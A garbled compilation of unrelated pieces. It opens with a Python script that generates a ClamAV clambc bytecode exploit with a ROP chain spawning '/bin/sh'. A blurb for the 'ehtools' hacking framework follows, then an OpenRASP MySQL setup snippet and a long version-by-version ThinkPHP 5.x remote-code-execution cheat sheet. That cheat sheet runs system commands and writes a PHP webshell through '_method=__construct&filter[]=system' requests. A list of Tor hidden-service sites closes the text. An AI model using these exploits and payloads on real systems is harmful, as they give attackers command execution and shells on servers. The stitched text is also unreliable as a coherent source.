#!/usr/bin/python
'''
Finished : 22/07/2019
Pu8lished : 31/10/2019
Versi0n : Current (<= 0.102.0)
Result : Just for fun.
"Because of my inability to change the world."
In 2002, ClamAV got introducted as a solution for malwares on UNIX-based systems, built on
a signature-based detection approach, and still undergoes active-development. by that time,
LibClamAV only held 2 binaries, and expanded to 5 at present.
ClamBC were exceptionally more complex and served as a testing tool for bytecodes, majorly
validating and interpreting the code therein, and the information provided didn't indicate
nor explain the presence of its internal mechanisms.
The availability of the source-code and the lack of documentation led to the establishment
of this paper, it was certainly not an attempt to escalate privileges, but rather a sought
-after experience, and source of entertainment that grants the thrill of a challenge.
Due to the considerable amount of time spent in the analysis, the dissection of the engine
was imminent, whilst significantly broadening our perception on its internal structures.
The trial and error process produced valuable information, crashes illuminated latent bugs,
effectively increasing the attack surface, and magnifying the possibility for exploitation.
> ./exploit.py
> clambc --debug exploit
[SNIP]
$
'''
names = ['test1',
'read',
'write',
'seek',
'setvirusname',
'debug_print_str',
'debug_print_uint',
'disasm_x86',
'trace_directory',
'trace_scope',
'trace_source',
'trace_op',
'trace_value',
'trace_ptr',
'pe_rawaddr',
'file_find',
'file_byteat',
'malloc',
'test2',
'get_pe_section',
'fill_buffer',
'extract_new',
'read_number',
'hashset_new',
'hashset_add',
'hashset_remove',
'hashset_contains',
'hashset_done',
'hashset_empty',
'buffer_pipe_new',
'buffer_pipe_new_fromfile',
'buffer_pipe_read_avail',
'buffer_pipe_read_get',
'buffer_pipe_read_stopped',
'buffer_pipe_write_avail',
'buffer_pipe_write_get',
'buffer_pipe_write_stopped',
'buffer_pipe_done',
'inflate_init',
'inflate_process',
'inflate_done',
'bytecode_rt_error',
'jsnorm_init',
'jsnorm_process',
'jsnorm_done',
'ilog2',
'ipow',
'iexp',
'isin',
'icos',
'memstr',
'hex2ui',
'atoi',
'debug_print_str_start',
'debug_print_str_nonl',
'entropy_buffer',
'map_new',
'map_addkey',
'map_setvalue',
'map_remove',
'map_find',
'map_getvaluesize',
'map_getvalue',
'map_done',
'file_find_limit',
'engine_functionality_level',
'engine_dconf_level',
'engine_scan_options',
'engine_db_options',
'extract_set_container',
'input_switch',
'get_environment',
'disable_bytecode_if',
'disable_jit_if',
'version_compare',
'check_platform',
'pdf_get_obj_num',
'pdf_get_flags',
'pdf_set_flags',
'pdf_lookupobj',
'pdf_getobjsize',
'pdf_getobj',
'pdf_getobjid',
'pdf_getobjflags',
'pdf_setobjflags',
'pdf_get_offset',
'pdf_get_phase',
'pdf_get_dumpedobjid',
'matchicon',
'running_on_jit',
'get_file_reliability',
'json_is_active',
'json_get_object',
'json_get_type',
'json_get_array_length',
'json_get_array_idx',
'json_get_string_length',
'json_get_string',
'json_get_boolean',
'json_get_int']
o = names.index('buffer_pipe_new') + 1
k = names.index('buffer_pipe_write_get') + 1
l = names.index('debug_print_str') + 1
m = names.index('malloc') + 1
c = 0
for name in names:
names[c] = name.encode('hex')
c += 1
def cc(n):
v = chr(n + 0x60)
return v
def cs(s):
t = ''
for i in xrange(0, len(s), 2):
u = int(s[i], 16)
l = int(s[i + 1], 16)
for i in [u, l]:
if((i >= 0 and i <= 0xf)):
continue
print 'Invalid string.'
exit(0)
t += cc(l) + cc(u)
return t
def wn(n, fixed=0, size=0):
if n is 0:
return cc(0)
t = ''
c = hex(n)[2:]
l = len(c)
if (l % 2) is 1:
c = "0" + c
r = c[::-1]
if(l <= 0x10):
if not fixed:
t = cc(l)
i = 0
while i < l:
t += cc(int(r[i], 16))
i += 1
else:
print 'Invalid number.'
exit(0)
if size != 0:
t = t.ljust(size, '`')
return t
def ws(s):
t = '|'
e = s[-2:]
if(e != '00'):
print '[+] Adding null-byte at the end of the string..'
s += '00'
l = (len(s) / 2)
if (len(s) % 2) is 1:
print 'Invalid string length.'
exit(0)
t += wn(l)
t += cs(s)
return t
def wt(t):
if t < (num_types + 0x45):
v = wn(t)
return v
else:
print 'Invalid type.'
exit(0)
def initialize_header(minfunc=0, maxfunc=0, num_func=0, linelength=4096):
global flimit, num_types
if maxfunc is 0:
maxfunc = flimit
if(minfunc > flimit or maxfunc < flimit):
print 'Invalid minfunc and/or maxfunc.'
exit(0)
header = "ClamBC"
header += wn(0x07) # formatlevel(6, 7)
header += wn(0x88888888) # timestamp
header += ws("416c69656e") # sigmaker
header += wn(0x00) # targetExclude
header += wn(0x00) # kind
header += wn(minfunc) # minfunc
header += wn(maxfunc) # maxfunc
header += wn(0x00) # maxresource
header += ws("00") # compiler
header += wn(num_types + 5) # num_types
header += wn(num_func) # num_func
header += wn(0x53e5493e9f3d1c30) # magic1
header += wn(0x2a, 1) # magic2
header += ':'
header += str(linelength)
header += chr(0x0a)*2
return header
def prepare_types(contained, type=1, nume=1):
global num_types
types = "T"
types += wn(0x45, 1) # start_tid(69)
for i in range(0, num_types):
types += wn(type[i], 1) # kind
if type[i] in [1, 2, 3]:
# Function, PackedStruct, Struct
types += wn(nume[i]) # numElements
for j in range(0, nume[i]):
types += wt(contained[i][j]) # containedTypes[j]
else:
# Array, Pointer
if type[i] != 5:
types += wn(nume[i]) # numElements
types += wt(contained[i][0]) # containedTypes[0]
types += chr(0x0a)
return types
def prepare_apis(calls=1):
global maxapi, names, ids, tids
if(calls > max_api):
print 'Invalid number of calls.'
exit(0)
apis = 'E'
apis += wn(max_api) # maxapi
apis += wn(calls) # calls(<= maxapi)
for i in range(0, calls):
apis += wn(ids[i]) # id
apis += wn(tids[i]) # tid
apis += ws(names[ids[i] - 1]) # name
apis += chr(0x0a)
return apis
def prepare_globals(numglobals=1):
global max_globals, type, gval
globals = 'G'
globals += wn(max_globals) # maxglobals
globals += wn(numglobals) # numglobals
for i in range(0, numglobals):
globals += wt(type[i]) # type
for j in gval[i]: # subcomponents
n = wn(j)
globals += chr(ord(n[0]) - 0x20)
globals += n[1:]
globals += cc(0)
globals += chr(0x0a)
return globals
def prepare_function_header(numi, numbb, numa=1, numl=0):
global allo
if numa > 0xf:
print 'Invalid number of arguments.'
exit(0)
fheader = 'A'
fheader += wn(numa, 1) # numArgs
fheader += wt(0x20) # returnType
fheader += 'L'
fheader += wn(numl) # numLocals
for i in range(0, numa + numl):
fheader += wn(type[i]) # types
fheader += wn(allo[i], 1) # | 0x8000
fheader += 'F'
fheader += wn(numi) # numInsts
fheader += wn(numbb) # numBB
fheader += chr(0x0a)
return fheader
flimit = 93
max_api = 100
max_globals = 32773
num_types = 6
# Header parsing
w = initialize_header(num_func=0x1)
# Types parsing
cont = [[0x8], [0x45], [0x20, 0x20], [0x41, 0x20, 0x20], [0x20, 0x41, 0x20], [0x41, 0x20]]
type = [0x4, 0x5, 0x1, 0x1, 0x1, 0x1]
num = [0x8, 0x1, 0x2, 0x3, 0x3, 0x2]
w += prepare_types(cont, type, num)
# API parsing
ids = [o, k, l, m]
tids = [71, 72, 73, 74]
w += prepare_apis(0x4)
'''
# crash @ id=0
'''
# Globals parsing
type = [0x45]
gval = [[0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41]]
w += prepare_globals(0x1)
# Function header parsing
type = [0x45, 0x41, 0x40, 0x40, 0x40, 0x40, 0x20]
allo = [ 1, 0, 0, 0, 0, 0, 0]
w += prepare_function_header(35, 0x1, 0x0, 0x7)
# BB parsing
p = 'B'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x0)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += '@d'
# STORE (0x0068732f6e69622f(L=8) -> ([Var #1]))
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += 'Nobbfifnfobcghfh'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x360)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'C`fcd'
# LOAD Var #2 = ([Var #1])
p += wn(0x40)
p += wn(0x2)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #2 -= 0xd260
p += wn(0x40)
p += wn(0x2)
p += wn(0x2, 1, 2)
p += wn(0x2)
p += 'D`fbmd'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`ad'
# LOAD Var #3 = ([Var #1])
p += wn(0x40)
p += wn(0x3)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #3 -= 0x10
p += wn(0x40)
p += wn(0x3)
p += wn(0x2, 1, 2)
p += wn(0x3)
p += 'B`ad'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`cd'
# LOAD Var #4 = ([Var #1])
p += wn(0x40)
p += wn(0x4)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #4 -= 0x190
p += wn(0x40)
p += wn(0x4)
p += wn(0x2, 1, 2)
p += wn(0x4)
p += 'C`iad'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x38)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhcd'
# STORE (Var #3 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x3)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x48)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhdd'
# ADD Var #3 += 0x3
p += wn(0x40)
p += wn(0x3)
p += wn(0x2, 1, 2)
p += wn(0x3)
p += 'Acd'
# STORE (Var #3 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x3)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x28)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhbd'
# ADD Var #5 += Var #2 + 0xcbda
p += wn(0x40)
p += wn(0x5)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Djmkld'
# STORE (Var #5 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x5)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x20)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`bd'
# STORE (Var #4 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x4)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x18)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhad'
# ADD Var #5 += Var #2 + 0x99dc
p += wn(0x40)
p += wn(0x5)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Dlmiid'
# STORE (Var #5 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x5)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`ad'
# STORE (0x3b -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += 'Bkcd'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`cd'
# STORE (0x0 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += '@d'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x40)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`dd'
# STORE (0x0 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += '@d'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x8)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Ahd'
# ADD Var #2 += 0x6d68
p += wn(0x40)
p += wn(0x2)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Dhfmfd'
# STORE (Var #2 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x2)
p += wn(0x1)
'''
0x99dc : pop rdi ; ret
0xcbda : pop rsi ; ret
0x6d68 : pop rax ; ret
Var #2 = text_base
Var #3 = syscall (+3: pop rdx; ret)
Var #4 = "/bin/sh\x00"
pop rax; ret; o 0x8
59 o 0x10
pop rdi; ret; o 0x18
sh; address o 0x20
pop rsi; ret; o 0x28
0x0 o 0x30
pop rdx; ret; o 0x38
0x0 o 0x40
syscall o 0x48
'''
# COPY Var #6 = (0x5a90050f(o`e``ije))
p += wn(0x20)
p += wn(0x0)
p += wn(0x22, 1)
p += 'Ho`e``ijeh'
p += wn(0x6)
p += 'T'
p += wn(0x13, 1)
p += wn(0x20)
p += wn(0x6)
p += 'E'
w += p
f = open("exploit", "w")
f.write(w)
f.close()
print '[+] Generated payload'
'''
twitter:@momika233
'''
INFO: Our framework has more than 100 packages in
ehtools archive (on server this archive: 2.3 Tb)!
在下一个菜单中,工具分为主要类别,并提供用于管理脚本安装的选项。提供的选项有:
Wi-Fi工具(攻击无线网络的工具)。
INFO: Wi-Fi options this is tools for attacking
wireless networks and network databases.
远程访问(用于远程访问其他设备并进行远程管理的工具)。
INFO: Remote access means tools for getting access
to other devices and remotely managing them.
信息收集(在人或网站上收集情报)。
INFO: Information gathering tools, tools for
collecting intelligence on peaple or website.
网站工具(用于利用或攻击网站的工具)。
INFO: Website tools, tools for exploiting or
attacking sites and network databases.
其他(其他黑客工具的各种集合)
INFO: Other tools this is collection
of miscellaneous hacking tools.
您还可以通过访问选项6管理已安装的工具。
使用ehtools快速访问
INFO: Ehtools quick access, this is when you run
ehtools and for example ehtools -r to remove ehtools!
运行它以打开快速访问菜单:
ehtools -o
运行它来卸载ehtools:
ehtools -u
运行它以打开握手菜单:
ehtools -h
运行它以打开“查找WPS”菜单:
ehtools -w
INFO: For this shortcuts you will not need enter
your ehtools password (only for ehtools -u)!
使用ehtools应用程序
INFO: Ehtools application is an Ehtools Framework shortcut
that allows users to run Ehtools Framework just selecting
ehtools in the applications and clicking on it! I mean ehtools
application allows users to run ehtools via the application!
有两种方法设置ehtools应用程序:
使用安装程序
INFO: The ehtools INSTALLER allows
you to create ehtools application.
使用ehtapp
INFO: There is an ehtools utility named
ehtapp (read more in Ehtools Utilities) that
allows users to configure ehtools application.
ehtapp -c
为什么选择ehtools框架?
默认情况下,安装了58种以上的渗透测试工具
INFO: More than 58 options installed by default you
can find in ehtools, this is tools such as MetaSploit,
WireShark and other tools!
密码保护和配置加密
INFO: In version 2.1.6 we added pasword protection,
we added it for users who think that his/her friend or
parents will turn into ehtools and will remove or destroy
it. Only for this people we create password protection
for Ehtools Framework :)
易于学习,这是初学者的最佳框架
INFO: Ehtools Framework's TUI is very simple for beginners,
you can start attack on the local network by choosing an
option from main menu. It is very simple, is not it?
初学者的UX / UI改进
INFO: It uses the names you supply to connect to the tools needed to
execute any attacks you select! Aside from that initial input, the majority
of the possible attacks can be performed merely by choosing the option number
from the menu. This means you can grab a network handshake or download a new
hacking tool like Pupy by just selecting from one of the menu options!
您可以从ehtools安装100多种工具
INFO: Our framework has more than 100 packages in ehtools
archive (on server this archive: 2.3 Tb)! But if you are using
ehtools LITE you could install only 50% of this tools!
Ehtools wifi渗透工具框架
系统要求
Ehtools Framework仅支持两个操作系统
INFO: Ehtools Framework only supports two
operating systems - Kali Linux and Parrot OS!
完全root访问权限和对/ root文件夹的访问
INFO: All ehtools files and folders will be copied to /root,
/bin and /etc system folders, to copy ehtools data to
your system Ehtools Framework needs full root access!
良好的Internet连接以支持服务器(仅ehtools PRO)
INFO: The server support for ehtools PRO is one of system
requirements, it is needed for collect information about
ehtools crashes and it is also needed for check product
status such as (you bought ehtools/you did not buy ehtools)
Usage: uiecache [OPTION...]
Copyright (C) 2019, Entynetproject. All Rights Reserved.
-a --all Uninstall all ehtools cache.
(standart old uiecache)
-p --path <path> Uninstall ehtools cache from your path.
(uninstall cache from path)
-r --restart Restart all ehtools processes and services.
(restart ehtools system)
-h --help Give this help list.
Usage: ehtmod [OPTION...]
Copyright (C) 2019, Entynetproject. All Rights Reserved.
-i --install Install ehtools modules to /bin/ehtools.
(install ehtools modules)
-t --take <name> Take a new ehtools modules snapshot.
(take ehtools modules snapshot)
-r --restore <name> Restore saved ehtools modules snapshot.
(restore ehtools modules snapshot)
-d --delete <name> Delete saved ehtools modules snapshot.
(delete ehtools modules snapshot)
-u --uninstall Uninstall ehtools modules from /bin/ehtools.
(uninstall ehtools modules)
-h --help Give this help list.
要安装ehtools模块,您需要执行以下命令:
INFO: The ehtools INSTALLER will ask you to "install" or "not
install" ehtools modules and if you answered "not install" and
want to install them, run the following command!
模块-i
Ehtools模块快照(EMS)
INFO: EMS is a saved ehtools modules data from /bin/ehtools and
/root/ehtools/eht (this is a saved ehtools modules data), you can
take it using the ehtmod utility v1.9 and restore it.
INFO: EMR is an operation that removing /bin/ehtools and
/root/ehtools/eht and restoring it from the saved ehtools modules
snapshot, you can restore it using the ehtmod utility v1.9, but ESR will
remove all your old ehtools modules data from /bin/ehtools and /root/ehtools/eht!
Usage: ehtapp [OPTION...]"
Copyright (C) 2019, Entynetproject. All Rights Reserved.
-c --create Create ehtools application.
(create shortcut application)
-d --desktop <option> Create/remove ehtools desktop application.
(create/remove desktop shortcut application)
-r --remove Remove ehtools application.
(remove shortcut application)
-h --help Give this help list.
要创建ehtools应用程序,您需要执行以下命令:
INFO: The ehtools INSTALLER will ask you to "create" or
"not create" ehtools application and if you answered "not
create" and want to create it, run the following command!
配置 MySQL 数据库,建立名为 openrasp 的数据库,并为 rasp@% 授权,密码为 rasp123(建议使用强度更高的密码,这里只是举例)。请用 root 账号连接 mysql 并执行如下语句:
DROP DATABASE IF EXISTS openrasp;
CREATE DATABASE openrasp default charset utf8mb4 COLLATE utf8mb4_general_ci;
grant all privileges on openrasp.* to 'rasp'@'%' identified by 'rasp123';
grant all privileges on openrasp.* to 'rasp'@'localhost' identified by 'rasp123';
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.1
debug 无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.2
debug 无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.3
debug 无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.4
debug 无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.5
debug 无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.6
debug 无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.7
debug 无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.8
debug 无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.9
debug 无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.10
从5.0.10开始默认debug=false,debug无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.11
默认debug=false,debug无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.12
默认debug=false,debug无关
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.13
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
我们继续
5.0.13补充
补充
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.0.14
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.0.15
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.0.16
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.0.17
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.0.18
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.0.19
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.0.20
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
5.0.21
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc
写shell
POST
_method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('Y4er.php','<?php phpinfo();')
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
POST ?s=captcha
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
5.0.22
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc
写shell
POST
_method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('Y4er.php','<?php phpinfo();')
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
POST ?s=captcha
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
5.0.23
默认debug=false,需要开启debug
命令执行
POST ?s=index/index
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc
写shell
POST
_method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('Y4er.php','<?php phpinfo();')
有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
POST ?s=captcha
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
5.0.24
作为5.0.x的最后一个版本,rce被修复
5.1.0
默认debug为true
命令执行
POST ?s=index/index
_method=__construct&filter[]=system&method=GET&s=calc
写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
public function init()
{
// 解析默认的URL规则
$result = $this->parseUrl($this->dispatch);
return (new Module($this->request, $this->rule, $result))->init();
}
PHP
进入parseUrl()
进入parseUrlPath()
在此处从url中获取[模块/控制器/操作],导致parseUrl()返回的route为
导致thinkphp/library/think/App.php:406的$dispatch为
直接调用了input()函数,然后会执行到 App 类的 run 方法,进而调用 Dispatch 类的 run 方法,该方法会调用关键函数 execthinkphp/library/think/route/dispatch/Module.php:84,进而调用反射类
此时反射类的参数均可控,调用input()
在进入input()之后继续进入$this->filterValue()
跟进后执行call_user_func(),实现rce
整个流程中没有对控制器进行合法校验,导致可以调用任意控制器,实现rce。
修复
// 获取控制器名
$controller = strip_tags($result[1] ?: $config['default_controller']);
if (!preg_match('/^[A-Za-z](w|.)*$/', $controller)) {
throw new HttpException(404, 'controller not exists:' . $controller);
}
Tor Metrics
– Welcome to Tor Metrics, the primary place to learn interesting facts
about the Tor network, the largest deployed anonymity network to date.
If something can be measured safely, you’ll find it here.
Superkuh – Much information about spectrogram, wireless, and radio.
Beneath VT – Exploring Virginia Tech’s steam tunnels and beyond.
Tor Against CP! – Free and clean Tor – Tor users against CP!
Go Beyond A blog about politics, potatoes, technology, Tor, etc.
Email / Messaging
See also: The compendium of clear net Email providers.
secMail.pro – Complete mail service that allows you to send and receive mails without violating your privacy.
Mail2Tor – Mail2Tor is a free anonymous e-mail service made to protect your privacy.
Elude.in – Elude.in is a privacy based email service and a Bitcoin/Monero exchange.
